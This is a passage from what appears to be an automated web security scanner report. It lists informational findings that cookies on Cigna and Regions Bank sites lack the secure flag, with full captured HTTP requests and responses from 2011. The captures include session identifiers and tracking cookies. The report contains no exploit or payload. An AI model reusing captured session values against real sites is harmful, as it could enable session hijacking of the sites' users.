Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/x-javascript
date: Mon, 16 May 2011 15:30:36 GMT
last-modified: Wed, 20 Apr 2011 17:47:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 168592

function progressbar(limit, met, gwidth) {    
calpercentage = Math.round(met*100/limit);
calwidth=Math.round(gwidth*(calpercentage/100));
remwidth=Math.round(gwidth-calwidth)
output='<div class="out
...[SNIP]...

5.18. https://my.cigna.com/mycignatheme/js/min/jsTop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/js/min/jsTop.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/js/min/jsTop.js HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=68E806DE7FD1107F11DEAFC5F6A8CE37; TLTUID=68E806DE7FD1107F11DEAFC5F6A8CE37; MYCIGNA_OEP_JSESSIONID=0000gya5ooLNN8su43COFm2xuVB:15ngp3vj1; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: application/x-javascript
date: Mon, 16 May 2011 15:30:26 GMT
last-modified: Wed, 20 Apr 2011 17:47:00 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/
Content-Length: 168592

function progressbar(limit, met, gwidth) {    
calpercentage = Math.round(met*100/limit);
calwidth=Math.round(gwidth*(calpercentage/100));
remwidth=Math.round(gwidth-calwidth)
output='<div class="out
...[SNIP]...

5.19. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/forgotpassword
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:15 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.

5.20. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/forgotid
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:05 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.

5.21. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=73F9C9687FD1107FC7C5A536181C0CE6; TLTHID=76A27AB67FD1107FC7F0A536181C0CE6

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 139
content-type: text/plain
date: Mon, 16 May 2011 15:31:16 GMT
last-modified: Fri, 22 Apr 2011 16:46:54 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_d992271a-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; Path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<....PLTE........3.....tRNS....0J...IDATx.b`d..0.......-.....IEND.B`.

5.22. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /web/public/guest HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: http://www.mycigna.com/
Cache-Control: max-age=0
Origin: http://www.mycigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:21 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 22481
ibm-web2-location: /web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: private, max-age=60
expires: Mon, 16 May 2011 15:31:21 GMT
Set-Cookie: TLTSID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=698A01C87FD1107F1A7A812241DDEA34; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:21 GMT
Set-Cookie: PD_STATEFUL_ccb88d86-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 22491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

5.23. https://my.cigna.com/web/public/guest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /web/public/guest

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /web/public/guest HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/
Cache-Control: max-age=0
Origin: https://my.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTSID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:33 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 22481
ibm-web2-location: /web/public/guest/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gPI3cDdycTQ3eDYEs3A89AR0tHN2dXQwN_I30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAH_V_3g!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: private, max-age=60
expires: Mon, 16 May 2011 15:31:33 GMT
Set-Cookie: PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 22491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

5.24. https://secure.regionsmortgage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.regionsmortgage.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: secure.regionsmortgage.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
ntCoent-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:30:26 GMT
Set-Cookie: NSC_tfdvsf.npsuhbhf-wjq=ffffffffaf130e8145525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 15:47:24 GMT;path=/
Set-Cookie: rfaft2c1=3drGKRGPiL8l+bTjFqkS/7Avg5cA1; Domain=.regionsmortgage.com; Path=/; HttpOnly
Set-Cookie: rfaft2c1_.regionsmortgage.com_%2F_wlf=TlNDX3RmZHZzZi5ucHN1aGJoZi13anFf?xSHrpgIYavehm1DAGTFWnGGtSQcA&; Domain=.regionsmortgage.com; Expires=Wed, 01 Jan 2020 00:00:00 GMT; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private
Cache-Control: private
Set-Cookie: NSC_tfdvsf.sfhjpotnpsuhbhf.dpn=ffffffffaf130d0445525d5f4f58455e445a4a423660;path=/;secure
Content-Length: 1635

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

5.25. https://secureapps.regions.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secureapps.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: secureapps.regions.com-ssl=R54983192; WT_FPC=id=2125ecebef9cc3240da1305556579133:lv=1305556579133:ss=1305556579133

Response

HTTP/1.1 403 Forbidden
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:41:40 GMT

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

5.26. https://secureapps.regions.com/OAO/DESGetFiles.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /OAO/DESGetFiles.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OAO/DESGetFiles.aspx?type=styles&version=63438902696&files=13 HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Date: Mon, 16 May 2011 15:19:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: public
Expires: Thu, 16 Jun 2011 05:00:00 GMT
Content-Type: text/css; charset=utf-8
Content-Length: 804

.VAMErrorText
{
}

.VAMBlinkText
{
color: White;
}

.VAMFieldWithError
{
}

.VAMValSummary
{
color: red;
}

.VAMValSummary:link {color: red; text-decoration: none;}
.VAMValSum
...[SNIP]...

5.27. https://secureapps.regions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=maulyk45yit1a2rvnyvjro3i; WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 404 Not Found
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:46 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; cha
...[SNIP]...

5.28. https://secureapps.regions.com/oao/DES/Appearance/Validation/Validation.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/DES/Appearance/Validation/Validation.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/DES/Appearance/Validation/Validation.css HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=prefplus
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45

Response

HTTP/1.1 403 Forbidden
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 1529
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:02 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be displayed</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html;
...[SNIP]...

5.29. https://secureapps.regions.com/oao/ErrorPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/ErrorPage.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/ErrorPage.aspx HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreensavings
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=2ac1f5713c1606c63d81305555542668:lv=1305555570806:ss=1305555542668; ASP.NET_SessionId=wm55et55z1a3uoz33gj0wayn; secureapps.regions.com-ssl=R54983192

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54983192; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:21:02 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 9876


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...

5.30. https://secureapps.regions.com/oao/FormHandler.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/FormHandler.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/FormHandler.js HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: secureapps.regions.com-ssl=R54947255; ASP.NET_SessionId=x2zf2a45rab0i245f4jzczva

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 86459
Content-Type: application/x-javascript
Last-Modified: Wed, 20 Apr 2011 18:24:56 GMT
Accept-Ranges: bytes
ETag: "04cba3f88ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:18:56 GMT

...// JScript File
var IE = (document.all) ? 1 : 0; var NN4 = (document.layers) ? 1 : 0; var DOM = (document.getElementById && !document.all) ? 1 : 0; var NS7 = (document.getElementById) ? 1 : 0; var
...[SNIP]...

5.31. https://secureapps.regions.com/oao/Images/confirmation.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/confirmation.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/confirmation.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2319
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:06 GMT

GIF89a........t....nnn............VVV....U.DDD....................X.............`...............D.....w......!.......,............'.di.h..l..p,....B.!w.6.m0.*4.A...9...t:.....Q.4*.^.H .R...:v8~
m..g.
...[SNIP]...

5.32. https://secureapps.regions.com/oao/Images/funding.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/funding.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/funding.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 3849
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:18 GMT

GIF89a.......DDD.....................sssfff.......U.....l".....D.......`...f.......w3.....w..U...............!.......,............'.di.h..l..p,..`#.....|...`..
#..G.9......&.;./($...QB....h.9..E....1
...[SNIP]...

5.33. https://secureapps.regions.com/oao/Images/gettingstarted.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secureapps.regions.com
Path:   /oao/Images/gettingstarted.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /oao/Images/gettingstarted.gif HTTP/1.1
Host: secureapps.regions.com
Connection: keep-alive
Referer: https://secureapps.regions.com/oao/app01.aspx?type=lifegreenchk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=0i3ui555h1mv3f55ju5vpi45; secureapps.regions.com-ssl=R54947255

Response

HTTP/1.1 200 OK
Set-Cookie: secureapps.regions.com-ssl=R54947255; path=/
Content-Length: 2300
Content-Type: image/gif
Last-Modified: Wed, 20 Apr 2011 18:25:00 GMT
Accept-Ranges: bytes
ETag: "0a61c4288ffcb1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 15:19:07 GMT

GIF89a................ppp......VVV.......U.DDD........Y.w3...yyy....`...............D....l"...iii......fff...!.......,............'.di.h..l..p,..bC.w...}..M .*.#....9........;./($....F....h........oT.
...[SNIP]...

5.34. https://secureapps.regions.com/oao/Images/helpIcon.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
